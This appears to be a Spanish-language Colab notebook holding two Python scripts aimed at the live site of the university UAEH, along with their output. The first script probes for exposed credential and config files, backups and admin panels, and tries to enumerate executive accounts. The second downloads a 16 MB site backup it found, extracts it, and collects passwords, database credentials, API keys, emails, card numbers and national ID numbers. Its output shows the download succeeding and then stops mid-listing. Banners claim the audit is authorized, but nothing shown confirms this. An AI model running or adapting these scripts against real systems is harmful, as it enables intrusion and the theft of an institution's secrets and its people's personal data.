In [ ]:
# ╔════════════════════════════════════════════════════════════╗
# ║      🔍 UAEH SECURITY SCANNER - EDICIÓN ESPECIAL 🔍         ║
# ║         "A ver qué tan mal está esto..." Edition           ║
# ╚════════════════════════════════════════════════════════════╝

import requests
import re
from bs4 import BeautifulSoup
import socket
import ssl
import json
import base64
import time

class UAEHSecurityScanner:
    def __init__(self):
        self.target = "https://www.uaeh.edu.mx"
        self.findings = []
        self.severity_score = 0

    def run_full_audit(self):
        print("""
        ╔═══════════════════════════════════════════════════╗
        ║     🎓 UAEH SECURITY AUDIT - PENTEST MODE 🎓      ║
        ║         Solicitado por: Ciberseguridad            ║
        ╚═══════════════════════════════════════════════════╝
        """)

        print(f"\n🎯 TARGET: {self.target}")
        print("=" * 60)

        # Test 1: Credenciales obvias
        print("\n[TEST 1] 🔑 Buscando credenciales expuestas...")
        self.check_obvious_credentials()

        # Test 2: Archivos sensibles
        print("\n[TEST 2] 📁 Buscando archivos sensibles...")
        self.check_sensitive_files()

        # Test 3: Paneles de admin
        print("\n[TEST 3] 🔐 Buscando paneles administrativos...")
        self.find_admin_panels()

        # Test 4: Information Disclosure
        print("\n[TEST 4] 📝 Verificando information disclosure...")
        self.check_info_disclosure()

        # Test 5: Directorios de backup
        print("\n[TEST 5] 💾 Buscando backups expuestos...")
        self.check_backups()

        # Test 6: Configuraciones expuestas
        print("\n[TEST 6] ⚙️ Buscando configuraciones...")
        self.check_configs()

        # Test 7: APIs y Endpoints
        print("\n[TEST 7] 🔌 Buscando APIs expuestas...")
        self.check_apis()

        # Test 8: Verificar SSL/TLS
        print("\n[TEST 8] 🔒 Verificando seguridad SSL/TLS...")
        self.check_ssl()

        # Test 9: Headers de seguridad
        print("\n[TEST 9] 🛡️ Verificando headers de seguridad...")
        self.check_security_headers()

        # Test 10: El test del rector
        print("\n[TEST 10] 👔 Buscando cuentas de directivos...")
        self.check_rector_accounts()

        # Generar reporte
        self.generate_report()

    def check_obvious_credentials(self):
        """Buscar credenciales obvias en archivos comunes"""
        credential_files = [
            'admin.txt', 'password.txt', 'passwords.txt', 'users.txt',
            'credentials.txt', 'login.txt', 'creds.txt', 'access.txt',
            'usuarios.txt', 'contraseñas.txt', 'acceso.txt',
            '.env', 'config.php', 'config.inc', 'settings.php',
            'wp-config.php', 'configuration.php', 'database.php',
            'db_config.php', 'connect.php', 'conexion.php'
        ]

        for file in credential_files:
            url = f"{self.target}/{file}"
            try:
                r = requests.get(url, timeout=3)
                if r.status_code == 200:
                    print(f"   ⚠️ ENCONTRADO: {file}")

                    # Buscar patterns de credenciales
                    patterns = [
                        r'(user|usuario|username|admin).*?[:=].*?([^\s]+)',
                        r'(pass|password|contraseña|pwd).*?[:=].*?([^\s]+)',
                        r'(token|api_key|apikey).*?[:=].*?([^\s]+)',
                    ]

                    for pattern in patterns:
                        matches = re.findall(pattern, r.text, re.IGNORECASE)
                        if matches:
                            print(f"      🔴 CREDENCIALES DETECTADAS EN {file}!")
                            self.severity_score += 100
                            self.findings.append(f"CRÍTICO: Credenciales en {file}")

                elif r.status_code == 403:
                    print(f"   🔒 {file} existe pero está protegido (403)")

            except:
                pass

    def check_sensitive_files(self):
        """Buscar archivos sensibles comúnmente expuestos"""
        sensitive_paths = [
            '.git/config', '.git/HEAD', '.svn/entries', '.vscode/settings.json',
            'phpinfo.php', 'test.php', 'info.php', '.log', 'error_log',
            'database.yml', 'application.yml', 'web.xml', 'server.xml'
        ]
        for path in sensitive_paths:
            test_url = f"{self.target.rstrip('/')}/{path}"
            try:
                response = requests.get(test_url, timeout=3, allow_redirects=False)
                if response.status_code == 200 and 'html' not in response.headers.get('Content-Type', ''):
                    print(f"   🚨 Archivo sensible encontrado: {path} [{response.status_code}]")
                    self.findings.append(f"Archivo sensible expuesto: {test_url}")
                    self.severity_score += 60
                elif response.status_code == 403:
                    print(f"   🔒 Archivo sensible {path} existe pero protegido (403)")
            except:
                pass

    def find_admin_panels(self):
        """Buscar paneles administrativos de la UAEH"""
        admin_urls = [
            'admin', 'administrator', 'admin.php', 'admin.html',
            'wp-admin', 'wp-login.php', 'cpanel', 'panel',
            'administracion', 'admin_uaeh', 'rector', 'rectoria',
            'sistemas', 'sistema', 'portal', 'portaldocente',
            'portalrector', 'gestion', 'control', 'dashboard',
            'intranet', 'extranet', 'login', 'signin', 'logon',
            'auth', 'autenticacion', 'acceso', 'entrada',
            'phpmyadmin', 'pma', 'mysql', 'database', 'db',
            'webmail', 'mail', 'correo', 'email',
            # Específicos para universidades
            'siiau', 'siiaa', 'escolares', 'controlescolar',
            'alumnos/admin', 'docentes/admin', 'profesores/admin',
            'secretaria', 'direccion', 'coordinacion'
        ]

        for path in admin_urls:
            url = f"{self.target}/{path}"
            try:
                r = requests.get(url, timeout=3, allow_redirects=False)
                if r.status_code in [200, 301, 302, 401, 403]:
                    print(f"   🔓 Panel encontrado: /{path} [{r.status_code}]")

                    if r.status_code == 200:
                        # Buscar forms de login
                        if 'login' in r.text.lower() or 'password' in r.text.lower():
                            print(f"      🎯 FORM DE LOGIN DETECTADO!")
                            self.findings.append(f"Panel admin: {url}")
                            self.severity_score += 30

            except:
                pass

    def check_rector_accounts(self):
        """Buscar específicamente cuentas de directivos"""
        print("   👔 Buscando cuentas de directivos...")

        # Nombres comunes de usuarios directivos
        directivos = [
            'rector', 'rectoria', 'director', 'direccion',
            'administrador', 'admin', 'root', 'superuser',
            'coordinador', 'jefe', 'sistemas', 'ti', 'it'
        ]

        # Verificar en diferentes contextos
        contexts = [
            '/login?user=', '/admin/login?username=',
            '/auth?user=', '/?user=', '/portal?usuario='
        ]

        for user in directivos:
            for context in contexts:
                url = f"{self.target}{context}{user}"
                try:
                    r = requests.get(url, timeout=2)

                    # Buscar hints en la respuesta
                    hints = [
                        'invalid password', 'contraseña incorrecta',
                        'usuario existe', 'user exists',
                        'cuenta bloqueada', 'too many attempts'
                    ]

                    for hint in hints:
                        if hint in r.text.lower():
                            print(f"      💡 Usuario '{user}' podría existir!")
                            self.findings.append(f"Posible usuario: {user}")
                            self.severity_score += 20
                            break

                except:
                    pass

        # Buscar en comentarios HTML
        try:
            r = requests.get(self.target)
            soup = BeautifulSoup(r.text, 'html.parser')
            comments = soup.find_all(string=lambda text: isinstance(text, str) and '<!--' in text)

            for comment in comments:
                if any(word in comment.lower() for word in ['user', 'pass', 'admin', 'rector']):
                    print(f"      📝 Comentario sospechoso encontrado en HTML")
                    self.severity_score += 15

        except:
            pass

    def check_backups(self):
        """Buscar archivos de backup"""
        backup_files = [
            'backup.zip', 'backup.tar.gz', 'site.zip', 'www.zip',
            'uaeh.zip', 'web.zip', 'public_html.zip', 'backup.sql',
            'dump.sql', 'database.sql', 'db.sql', 'uaeh.sql',
            'backup/', 'backups/', 'old/', 'temp/', 'tmp/',
            'backup2023/', 'backup2024/', 'respaldo/', 'copia/'
        ]

        for file in backup_files:
            url = f"{self.target}/{file}"
            try:
                r = requests.head(url, timeout=3)
                if r.status_code == 200:
                    size = r.headers.get('Content-Length', 'Unknown')
                    print(f"   💾 BACKUP ENCONTRADO: {file} (Size: {size})")
                    self.findings.append(f"Backup expuesto: {file}")
                    self.severity_score += 50
                elif r.status_code == 403:
                    print(f"   🔒 {file} existe pero protegido")
            except:
                pass

    def check_configs(self):
        """Buscar archivos de configuración"""
        config_files = [
            '.env', '.env.example', '.env.local', '.env.production',
            'web.config', '.htaccess', '.htpasswd', 'php.ini',
            '.git/config', '.git/HEAD', '.svn/', '.vscode/',
            'composer.json', 'package.json', 'requirements.txt',
            'Dockerfile', 'docker-compose.yml', '.gitlab-ci.yml'
        ]

        for file in config_files:
            url = f"{self.target}/{file}"
            try:
                r = requests.get(url, timeout=3)
                if r.status_code == 200:
                    print(f"   ⚙️ CONFIG EXPUESTA: {file}")
                    self.findings.append(f"Config expuesta: {file}")
                    self.severity_score += 40

                    # Buscar datos sensibles
                    sensitive_patterns = [
                        r'(api[_-]?key|apikey).*?=.*?([^\s]+)',
                        r'(secret|token).*?=.*?([^\s]+)',
                        r'(password|pwd).*?=.*?([^\s]+)',
                        r'(database|db).*?=.*?([^\s]+)'
                    ]

                    for pattern in sensitive_patterns:
                        if re.search(pattern, r.text, re.IGNORECASE):
                            print(f"      🔑 DATOS SENSIBLES EN {file}!")
                            self.severity_score += 50

            except:
                pass

    def check_apis(self):
        """Buscar APIs expuestas"""
        api_endpoints = [
            'api/', 'api/v1/', 'api/v2/', 'rest/', 'graphql',
            'api/users', 'api/login', 'api/admin', 'api/config',
            'api/swagger', 'api/docs', 'api-docs/', 'swagger.json',
            'api/alumnos', 'api/profesores', 'api/calificaciones',
            'api/rector', 'api/directivos', 'api/empleados'
        ]

        for endpoint in api_endpoints:
            url = f"{self.target}/{endpoint}"
            try:
                r = requests.get(url, timeout=3)
                if r.status_code == 200:
                    try:
                        json.loads(r.text)
                        print(f"   🔌 API ENDPOINT ACTIVO: {endpoint}")
                        self.findings.append(f"API expuesta: {endpoint}")
                        self.severity_score += 25
                    except:
                        if 'api' in r.text.lower():
                            print(f"   🔌 Posible API: {endpoint}")
            except:
                pass

    def check_ssl(self):
        """Verificar configuración SSL/TLS"""
        try:
            import socket
            import ssl

            context = ssl.create_default_context()
            with socket.create_connection(("www.uaeh.edu.mx", 443)) as sock:
                with context.wrap_socket(sock, server_hostname="www.uaeh.edu.mx") as ssock:
                    cert = ssock.getpeercert()
                    cipher = ssock.cipher()
                    version = ssock.version()

                    print(f"   🔒 SSL Version: {version}")
                    print(f"   🔒 Cipher: {cipher[0]}")

                    # Verificar si usa TLS antiguo
                    if version in ['TLSv1', 'TLSv1.1', 'SSLv2', 'SSLv3']:
                        print(f"      ⚠️ VERSIÓN TLS OBSOLETA!")
                        self.findings.append(f"TLS obsoleto: {version}")
                        self.severity_score += 30

        except Exception as e:
            print(f"   ❌ Error verificando SSL: {e}")

    def check_info_disclosure(self):
        """Buscar información expuesta"""
        try:
            r = requests.get(self.target)

            # Buscar números de versión
            versions = re.findall(r'([\w]+[/ ](?:v|version)?[\d.]+)', r.text, re.IGNORECASE)
            if versions:
                print(f"   📝 Versiones detectadas: {versions[:5]}")

            # Buscar emails
            emails = re.findall(r'[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}', r.text)
            if emails:
                print(f"   📧 Emails encontrados: {len(emails)}")
                unique_domains = set([e.split('@')[1] for e in emails])
                print(f"      Dominios: {unique_domains}")

            # Buscar IPs internas
            ips = re.findall(r'\b(?:10|172|192)\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', r.text)
            if ips:
                print(f"   🔍 IPs INTERNAS EXPUESTAS: {ips}")
                self.findings.append(f"IPs internas: {ips}")
                self.severity_score += 20

        except:
            pass

    def check_security_headers(self):
        """Verificar headers de seguridad"""
        try:
            r = requests.get(self.target)
            headers = r.headers

            security_headers = {
                'X-Frame-Options': 'Falta X-Frame-Options (Clickjacking)',
                'X-Content-Type-Options': 'Falta X-Content-Type-Options',
                'Content-Security-Policy': 'Falta CSP',
                'Strict-Transport-Security': 'Falta HSTS',
                'X-XSS-Protection': 'Falta XSS Protection'
            }

            for header, message in security_headers.items():
                if header not in headers:
                    print(f"   ⚠️ {message}")
                    self.severity_score += 5
                else:
                    print(f"   ✓ {header} presente")

        except:
            pass

    def generate_report(self):
        """Generar reporte final"""
        print("\n" + "=" * 60)
        print("📋 REPORTE DE SEGURIDAD - UAEH")
        print("=" * 60)

        # Calcular nivel de riesgo
        if self.severity_score >= 300:
            risk = "CRÍTICO 🔴"
        elif self.severity_score >= 150:
            risk = "ALTO 🟠"
        elif self.severity_score >= 75:
            risk = "MEDIO 🟡"
        else:
            risk = "BAJO 🟢"

        print(f"\n⚠️ NIVEL DE RIESGO: {risk}")
        print(f"📊 SEVERITY SCORE: {self.severity_score}/500")

        print("\n🔍 HALLAZGOS PRINCIPALES:")
        if self.findings:
            for finding in self.findings:
                print(f"   • {finding}")
        else:
            print("   • No se encontraron vulnerabilidades críticas")

        print("\n💡 RECOMENDACIONES:")
        print("   1. Revisar archivos expuestos públicamente")
        print("   2. Implementar autenticación en paneles admin")
        print("   3. Actualizar configuración SSL/TLS")
        print("   4. Añadir headers de seguridad")
        print("   5. Auditar permisos de archivos")

        # Guardar reporte
        with open('uaeh_security_report.txt', 'w') as f:
            f.write(f"REPORTE DE SEGURIDAD UAEH\n")
            f.write(f"Fecha: {time.strftime('%Y-%m-%d %H:%M:%S')}\n")
            f.write(f"Riesgo: {risk}\n")
            f.write(f"Score: {self.severity_score}/500\n\n")
            f.write(f"Hallazgos:\n")
            for finding in self.findings:
                f.write(f"- {finding}\n")

        print("\n📄 Reporte guardado en: uaeh_security_report.txt")
        print("\n✅ AUDITORÍA COMPLETADA")

# EJECUTAR
def main():
    scanner = UAEHSecurityScanner()
    scanner.run_full_audit()

if __name__ == "__main__":
    main()


        ╔═══════════════════════════════════════════════════╗
        ║     🎓 UAEH SECURITY AUDIT - PENTEST MODE 🎓      ║
        ║         Solicitado por: Ciberseguridad            ║
        ╚═══════════════════════════════════════════════════╝
        

🎯 TARGET: https://www.uaeh.edu.mx

[TEST 1] 🔑 Buscando credenciales expuestas...
   🔒 .env existe pero está protegido (403)

[TEST 2] 📁 Buscando archivos sensibles...
   🚨 Archivo sensible encontrado: .vscode/settings.json [200]

[TEST 3] 🔐 Buscando paneles administrativos...
   🔓 Panel encontrado: /rectoria [301]
   🔓 Panel encontrado: /sistemas [301]

[TEST 4] 📝 Verificando information disclosure...
   📝 Versiones detectadas: ['menos 280', 'MENU 1', 'MENU 1', 'MENU 2', 'MENU 2']

[TEST 5] 💾 Buscando backups expuestos...
   💾 BACKUP ENCONTRADO: web.zip (Size: 16645520)

[TEST 6] ⚙️ Buscando configuraciones...

[TEST 7] 🔌 Buscando APIs expuestas...

[TEST 8] 🔒 Verificando seguridad SSL/TLS...
   🔒 SSL Version: TLSv1.2
   🔒 Cipher: EC

https://www.uaeh.edu.mx/.vscode/settings.json

In [3]:
# ╔═══════════════════════════════════════════════════════════════╗
# ║  💎 UAEH BACKUP ANALYZER 3000 - GOOGLE COLAB EDITION 💎       ║
# ║         "Encontremos las joyas ocultas..." 🔍                 ║
# ╚═══════════════════════════════════════════════════════════════╝

import os
import re
import zipfile
import requests
from pathlib import Path
import subprocess

class BackupAnalyzer:
    def __init__(self):
        self.target_url = "https://www.uaeh.edu.mx/web.zip"
        self.backup_file = "web.zip"
        self.extract_dir = "uaeh_backup"
        self.findings = {
            'passwords': [],
            'databases': [],
            'ips_internas': [],
            'emails': [],
            'api_keys': [],
            'sql_files': [],
            'config_files': [],
            'sensitive_files': []
        }

    def download_backup(self):
        """Descargar el backup"""
        print("╔" + "═" * 58 + "╗")
        print("║" + " " * 10 + "💾 DESCARGANDO BACKUP DE UAEH 💾" + " " * 10 + "║")
        print("╚" + "═" * 58 + "╝\n")

        print(f"🎯 URL: {self.target_url}")
        print("⏬ Descargando...")

        try:
            response = requests.get(self.target_url, stream=True)
            total_size = int(response.headers.get('content-length', 0))

            with open(self.backup_file, 'wb') as f:
                downloaded = 0
                for chunk in response.iter_content(chunk_size=8192):
                    f.write(chunk)
                    downloaded += len(chunk)
                    progress = (downloaded / total_size) * 100
                    print(f"\r   📊 Progreso: {progress:.1f}% ({downloaded}/{total_size} bytes)", end='')

            print(f"\n✅ Descarga completa: {self.backup_file}")
            print(f"📦 Tamaño: {total_size / 1024 / 1024:.2f} MB\n")
            return True

        except Exception as e:
            print(f"❌ Error descargando: {e}")
            return False

    def extract_backup(self):
        """Extraer el ZIP"""
        print("📂 Extrayendo archivos...")

        try:
            with zipfile.ZipFile(self.backup_file, 'r') as zip_ref:
                zip_ref.extractall(self.extract_dir)
                files = zip_ref.namelist()

            print(f"✅ {len(files)} archivos extraídos en: {self.extract_dir}/\n")
            return True

        except Exception as e:
            print(f"❌ Error extrayendo: {e}")
            return False

    def search_passwords(self):
        """Buscar contraseñas"""
        print("🔑 BUSCANDO CONTRASEÑAS...")

        password_patterns = [
            r'password\s*[=:]\s*["\']([^"\']+)["\']',
            r'passwd\s*[=:]\s*["\']([^"\']+)["\']',
            r'pwd\s*[=:]\s*["\']([^"\']+)["\']',
            r'contraseña\s*[=:]\s*["\']([^"\']+)["\']',
            r'pass\s*[=:]\s*["\']([^"\']+)["\']',
            r'secret\s*[=:]\s*["\']([^"\']+)["\']',
        ]

        for root, dirs, files in os.walk(self.extract_dir):
            for file in files:
                if file.endswith(('.php', '.js', '.txt', '.config', '.env', '.py', '.sql')):
                    filepath = os.path.join(root, file)
                    try:
                        with open(filepath, 'r', encoding='utf-8', errors='ignore') as f:
                            content = f.read()

                        for pattern in password_patterns:
                            matches = re.findall(pattern, content, re.IGNORECASE)
                            if matches:
                                for match in matches:
                                    self.findings['passwords'].append({
                                        'file': filepath.replace(self.extract_dir, ''),
                                        'password': match
                                    })
                                    print(f"   💎 ENCONTRADO en {file}: {match}")
                    except:
                        pass

    def search_databases(self):
        """Buscar configuraciones de base de datos"""
        print("\n🗄️ BUSCANDO CONFIGURACIONES DE DB...")

        db_patterns = [
            r'DB_HOST\s*[=:]\s*["\']([^"\']+)["\']',
            r'DB_USER\s*[=:]\s*["\']([^"\']+)["\']',
            r'DB_PASSWORD\s*[=:]\s*["\']([^"\']+)["\']',
            r'DB_NAME\s*[=:]\s*["\']([^"\']+)["\']',
            r'mysql://([^@]+)@([^/]+)/([^\s]+)',
            r'mysqli_connect\(["\']([^"\']+)["\'],\s*["\']([^"\']+)["\'],\s*["\']([^"\']+)["\']',
        ]

        for root, dirs, files in os.walk(self.extract_dir):
            for file in files:
                if file.endswith(('.php', '.config', '.env', '.py', '.js')):
                    filepath = os.path.join(root, file)
                    try:
                        with open(filepath, 'r', encoding='utf-8', errors='ignore') as f:
                            content = f.read()

                        for pattern in db_patterns:
                            matches = re.findall(pattern, content, re.IGNORECASE)
                            if matches:
                                self.findings['databases'].append({
                                    'file': filepath.replace(self.extract_dir, ''),
                                    'info': matches
                                })
                                print(f"   🎯 DB CONFIG en {file}: {matches}")
                    except:
                        pass

    def search_internal_ips(self):
        """Buscar IPs internas"""
        print("\n🔍 BUSCANDO IPs INTERNAS...")

        ip_pattern = r'\b(10\.\d{1,3}\.\d{1,3}\.\d{1,3}|172\.(?:1[6-9]|2\d|3[01])\.\d{1,3}\.\d{1,3}|192\.168\.\d{1,3}\.\d{1,3})\b'

        for root, dirs, files in os.walk(self.extract_dir):
            for file in files:
                filepath = os.path.join(root, file)
                try:
                    with open(filepath, 'r', encoding='utf-8', errors='ignore') as f:
                        content = f.read()

                    matches = re.findall(ip_pattern, content)
                    if matches:
                        unique_ips = set(matches)
                        for ip in unique_ips:
                            self.findings['ips_internas'].append({
                                'file': filepath.replace(self.extract_dir, ''),
                                'ip': ip
                            })
                            print(f"   🌐 IP en {file}: {ip}")
                except:
                    pass

    def search_emails(self):
        """Buscar emails"""
        print("\n📧 BUSCANDO EMAILS...")

        email_pattern = r'\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Z|a-z]{2,}\b'
        emails_found = set()

        for root, dirs, files in os.walk(self.extract_dir):
            for file in files:
                filepath = os.path.join(root, file)
                try:
                    with open(filepath, 'r', encoding='utf-8', errors='ignore') as f:
                        content = f.read()

                    matches = re.findall(email_pattern, content)
                    if matches:
                        for email in matches:
                            if email not in emails_found:
                                emails_found.add(email)
                                self.findings['emails'].append(email)
                                print(f"   📨 {email}")
                except:
                    pass

    def search_api_keys(self):
        """Buscar API keys"""
        print("\n🔑 BUSCANDO API KEYS...")

        api_patterns = [
            r'api[_-]?key\s*[=:]\s*["\']([^"\']{20,})["\']',
            r'apikey\s*[=:]\s*["\']([^"\']{20,})["\']',
            r'api[_-]?secret\s*[=:]\s*["\']([^"\']{20,})["\']',
            r'AKIA[0-9A-Z]{16}',  # AWS
            r'ghp_[a-zA-Z0-9]{36}',  # GitHub
            r'sk-[a-zA-Z0-9]{48}',  # OpenAI
        ]

        for root, dirs, files in os.walk(self.extract_dir):
            for file in files:
                filepath = os.path.join(root, file)
                try:
                    with open(filepath, 'r', encoding='utf-8', errors='ignore') as f:
                        content = f.read()

                    for pattern in api_patterns:
                        matches = re.findall(pattern, content, re.IGNORECASE)
                        if matches:
                            for match in matches:
                                self.findings['api_keys'].append({
                                    'file': filepath.replace(self.extract_dir, ''),
                                    'key': match
                                })
                                print(f"   🔐 API KEY en {file}: {match}")
                except:
                    pass

    def find_sql_files(self):
        """Encontrar archivos SQL"""
        print("\n📊 BUSCANDO ARCHIVOS SQL...")

        for root, dirs, files in os.walk(self.extract_dir):
            for file in files:
                if file.endswith('.sql'):
                    filepath = os.path.join(root, file)
                    size = os.path.getsize(filepath)
                    self.findings['sql_files'].append({
                        'file': filepath.replace(self.extract_dir, ''),
                        'size': size
                    })
                    print(f"   💾 {file} ({size / 1024:.2f} KB)")

    def find_config_files(self):
        """Encontrar archivos de configuración"""
        print("\n⚙️ BUSCANDO ARCHIVOS DE CONFIGURACIÓN...")

        config_names = [
            'config.php', 'configuration.php', 'settings.php',
            'database.php', 'db.php', 'conexion.php', 'connect.php',
            '.env', 'web.config', '.htaccess', 'php.ini'
        ]

        for root, dirs, files in os.walk(self.extract_dir):
            for file in files:
                if file in config_names or file.endswith('.config'):
                    filepath = os.path.join(root, file)
                    self.findings['config_files'].append(filepath.replace(self.extract_dir, ''))
                    print(f"   📄 {file}")

    def search_sensitive_data(self):
        """Buscar datos sensibles generales"""
        print("\n🚨 BUSCANDO DATOS SENSIBLES...")

        sensitive_patterns = {
            'Tarjetas': r'\b\d{4}[\s-]?\d{4}[\s-]?\d{4}[\s-]?\d{4}\b',
            'CURP': r'\b[A-Z]{4}\d{6}[HM][A-Z]{5}[0-9A-Z]\d\b',
            'RFC': r'\b[A-ZÑ&]{3,4}\d{6}[A-V1-9][A-Z1-9][0-9A]\b',
            'SSN': r'\b\d{3}-\d{2}-\d{4}\b',
        }

        for root, dirs, files in os.walk(self.extract_dir):
            for file in files:
                filepath = os.path.join(root, file)
                try:
                    with open(filepath, 'r', encoding='utf-8', errors='ignore') as f:
                        content = f.read()

                    for data_type, pattern in sensitive_patterns.items():
                        matches = re.findall(pattern, content)
                        if matches:
                            print(f"   ⚠️ {data_type} encontrados en {file}: {len(matches)} coincidencias")
                            self.findings['sensitive_files'].append({
                                'file': filepath.replace(self.extract_dir, ''),
                                'type': data_type,
                                'count': len(matches)
                            })
                except:
                    pass

    def generate_report(self):
        """Generar reporte final"""
        print("\n" + "═" * 60)
        print("📋 REPORTE FINAL DE ANÁLISIS")
        print("═" * 60)

        print(f"\n🔑 CONTRASEÑAS ENCONTRADAS: {len(self.findings['passwords'])}")
        for item in self.findings['passwords']:
            print(f"   • {item['file']}: {item['password']}")

        print(f"\n🗄️ CONFIGURACIONES DB: {len(self.findings['databases'])}")
        for item in self.findings['databases'][:5]:
            print(f"   • {item['file']}")

        print(f"\n🌐 IPs INTERNAS: {len(self.findings['ips_internas'])}")
        unique_ips = set([item['ip'] for item in self.findings['ips_internas']])
        for ip in unique_ips:
            print(f"   • {ip}")

        print(f"\n📧 EMAILS: {len(self.findings['emails'])}")
        for email in list(self.findings['emails'])[:10]:
            print(f"   • {email}")

        print(f"\n🔐 API KEYS: {len(self.findings['api_keys'])}")
        for item in self.findings['api_keys']:
            print(f"   • {item['file']}")

        print(f"\n💾 ARCHIVOS SQL: {len(self.findings['sql_files'])}")
        for item in self.findings['sql_files']:
            print(f"   • {item['file']} ({item['size'] / 1024:.2f} KB)")

        print(f"\n⚙️ ARCHIVOS CONFIG: {len(self.findings['config_files'])}")
        for file in self.findings['config_files']:
            print(f"   • {file}")

        # Guardar reporte
        with open('analisis_completo.txt', 'w', encoding='utf-8') as f:
            f.write("ANÁLISIS COMPLETO DEL BACKUP UAEH\n")
            f.write("=" * 60 + "\n\n")

            f.write(f"CONTRASEÑAS: {len(self.findings['passwords'])}\n")
            for item in self.findings['passwords']:
                f.write(f"  {item['file']}: {item['password']}\n")
            f.write("\n")

            f.write(f"IPs INTERNAS: {len(unique_ips)}\n")
            for ip in unique_ips:
                f.write(f"  {ip}\n")
            f.write("\n")

            f.write(f"EMAILS: {len(self.findings['emails'])}\n")
            for email in self.findings['emails']:
                f.write(f"  {email}\n")
            f.write("\n")

        print("\n📄 Reporte guardado en: analisis_completo.txt")
        print("\n✅ ANÁLISIS COMPLETADO")
        print("=" * 60)

    def run_full_analysis(self):
        """Ejecutar análisis completo"""
        if self.download_backup():
            if self.extract_backup():
                self.search_passwords()
                self.search_databases()
                self.search_internal_ips()
                self.search_emails()
                self.search_api_keys()
                self.find_sql_files()
                self.find_config_files()
                self.search_sensitive_data()
                self.generate_report()
            else:
                print("❌ No se pudo extraer el backup")
        else:
            print("❌ No se pudo descargar el backup")

# ═══════════════════════════════════════════════════════════
# EJECUTAR EN COLAB
# ═══════════════════════════════════════════════════════════

def main():
    print("""
    ╔════════════════════════════════════════════════════════╗
    ║   💎 UAEH BACKUP ANALYZER 3000 - COLAB EDITION 💎      ║
    ║        Análisis automatizado de backups web           ║
    ╚════════════════════════════════════════════════════════╝

    ⚠️ ADVERTENCIA: Solo para auditorías autorizadas
    """)

    input("Presiona ENTER para iniciar el análisis...")

    analyzer = BackupAnalyzer()
    analyzer.run_full_analysis()

    print("\n🎉 ¡PROCESO COMPLETADO!")
    print("📁 Archivos extraídos en: uaeh_backup/")
    print("📄 Reporte en: analisis_completo.txt")

if __name__ == "__main__":
    main()


    ╔════════════════════════════════════════════════════════╗
    ║   💎 UAEH BACKUP ANALYZER 3000 - COLAB EDITION 💎      ║
    ║        Análisis automatizado de backups web           ║
    ╚════════════════════════════════════════════════════════╝

    ⚠️ ADVERTENCIA: Solo para auditorías autorizadas
    
Presiona ENTER para iniciar el análisis...
╔══════════════════════════════════════════════════════════╗
║          💾 DESCARGANDO BACKUP DE UAEH 💾          ║
╚══════════════════════════════════════════════════════════╝

🎯 URL: https://www.uaeh.edu.mx/web.zip
⏬ Descargando...
   📊 Progreso: 100.0% (16645520/16645520 bytes)
✅ Descarga completa: web.zip
📦 Tamaño: 15.87 MB

📂 Extrayendo archivos...
✅ 979 archivos extraídos en: uaeh_backup/

🔑 BUSCANDO CONTRASEÑAS...

🗄️ BUSCANDO CONFIGURACIONES DE DB...

🔍 BUSCANDO IPs INTERNAS...
   🌐 IP en bo.svg: 10.5.8.5
   🌐 IP en pe.svg: 10.8.8.6
   🌐 IP en fk.svg: 10.6.9.8
   🌐 IP en bo.svg: 10.5.8.5
   🌐 IP en pe.svg: 10.8.8.6
   🌐 IP en fk.svg: 